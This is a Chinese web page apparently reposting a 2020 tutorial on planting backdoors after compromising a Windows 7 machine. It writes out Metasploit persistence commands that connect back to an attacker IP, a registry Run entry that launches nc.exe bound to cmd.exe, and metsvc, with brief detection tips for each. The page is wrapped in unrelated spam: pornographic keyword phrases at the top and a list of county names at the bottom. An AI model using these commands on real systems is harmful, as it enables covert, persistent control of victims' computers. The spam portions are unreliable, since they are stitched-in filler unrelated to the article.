五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

黑客是怎樣植入后門的

2020-09-13 11:38 作者:無(wú)情劍客Burning  | 我要投稿

聲明:謝絕一切形式的轉(zhuǎn)載,禁止用作非法目的

當(dāng)通過木馬或者漏洞成功入侵別人電腦后,由于MSF發(fā)起的攻擊都是基于內(nèi)存的,因此,當(dāng)被入侵的電腦關(guān)機(jī)之后或者漏洞修復(fù)之后,前期建立的連接就都不復(fù)存在了。所以,有必要在被入侵的電腦上安裝后門,讓"肉雞"每次重啟之后,都能和自己的機(jī)器自動(dòng)建立連接。

準(zhǔn)備條件

"肉雞": Windows7 32位 防火墻開啟

通過木馬建立連接

具體內(nèi)容可參考這里

Persistence 后門

建立后門

通過下面的幫助信息,可以看出persitence模塊是用來(lái)在目標(biāo)機(jī)器上創(chuàng)建后門的腳本。比較常用的參數(shù)-A 、-X、-I、-p、-r,具體含義可查看幫助。

  1. meterpreter > run persistence -h


  2. [!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.

  3. [!] Example: run exploit/windows/local/persistence OPTION=value [...]

  4. Meterpreter Script for creating a persistent backdoor on a target host.


  5. OPTIONS:


  6. -A ? ? ? ?Automatically start a matching exploit/multi/handler to connect to the agent

  7. -L <opt> Location in target host to write payload to, if none %TEMP% will be used.

  8. -P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.

  9. -S ? ? ? ?Automatically start the agent on boot as a service (with SYSTEM privileges)

  10. -T <opt> Alternate executable template to use

  11. -U ? ? ? ?Automatically start the agent when the User logs on

  12. -X ? ? ? ?Automatically start the agent when the system boots

  13. -h ? ? ? ?This help menu

  14. -i <opt> The interval in seconds between each connection attempt

  15. -p <opt> The port on which the system running Metasploit is listening

  16. -r <opt> The IP of the system running Metasploit listening for the connect back

建立一個(gè)后門,每隔5s嘗試建立連接,自動(dòng)匹配模塊exploit/multi/handler連接黑客的機(jī)器。

  1. run persistence -A -X -i 5 -p 9988 -r 192.168.42.49

運(yùn)行命令之后,可以看出生成了一個(gè)vbs腳本。Persistence 后門基于的就是這個(gè)腳本。

殺死9988端口對(duì)應(yīng)的會(huì)話。

  1. sessions -k 5

過一會(huì),發(fā)現(xiàn)9988端口的會(huì)話又建立起來(lái)了。

將"肉雞"重啟,查看9988端口的會(huì)話是否會(huì)被重新建立。

從圖中可以看出,重啟之后,會(huì)話又被成功建立起來(lái)了。

檢測(cè)后門

(1)查看相應(yīng)的目錄是否有可疑的vbs。 (2)查看可疑端口 (3)查看可疑的開機(jī)啟動(dòng)項(xiàng)

nc后門

建立nc后門

nc.exe具有"瑞士軍刀"的美名,其在反向連接方面的功能可以用強(qiáng)大甚至恐怖來(lái)形容。

上傳nc后門到"肉雞"

  1. upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

枚舉注冊(cè)表內(nèi)容(開機(jī)啟動(dòng)),注冊(cè)表相關(guān)的內(nèi)容在前面有介紹。

  1. reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

在該注冊(cè)表增加內(nèi)容(開機(jī)啟動(dòng))

  1. reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"

查看內(nèi)容

  1. reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

具體過程如下:

重啟"肉雞",通過nc連接

  1. nc 192.168.42.40 444

成功連接后,能夠獲得肉雞的cmd終端:

檢測(cè)nc后門

  1. 通過主注冊(cè)表的開機(jī)啟動(dòng)項(xiàng)目進(jìn)行檢測(cè)。

  2. 通過nc程序名字進(jìn)行檢測(cè),這個(gè)很容易繞過,改成具有迷惑行為的名字就可以

  3. 可疑端口檢測(cè)

metsvc后門

使用如下命令

  1. run metsvc

然后重啟之后,通過bind_tcp進(jìn)行主動(dòng)連接。 由于版本問題,在win7 32位上,相應(yīng)的服務(wù)起不來(lái),不做過多介紹。

寫在最后

后門植入,是進(jìn)行持續(xù)性攻擊的有效手段。其基本原理大都是基于開啟啟動(dòng)項(xiàng),大多數(shù)都是通過注冊(cè)表實(shí)現(xiàn)的,因此,開機(jī)啟動(dòng)項(xiàng)要認(rèn)真辨別,否則,你的機(jī)器可能就是一臺(tái)"肉雞"。

公眾號(hào)

相應(yīng)的視頻,后續(xù)會(huì)更新。更多內(nèi)容,歡迎關(guān)注我的微信公眾號(hào):無(wú)情劍客。




黑客是怎樣植入后門的的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
弋阳县| 巧家县| 改则县| 盐源县| 丁青县| 苏尼特左旗| 普宁市| 安福县| 台北县| 临夏县| 新野县| 家居| 新宁县| 绵阳市| 宜兰市| 瑞安市| 且末县| 岐山县| 漯河市| 南宁市| 张掖市| 教育| 宁安市| 内乡县| 常州市| 临澧县| 绥化市| 青神县| 米林县| 黑龙江省| 孟连| 遵义市| 禹州市| 高青县| 桑日县| 呼图壁县| 潞西市| 泸溪县| 无锡市| 荔浦县| 上思县|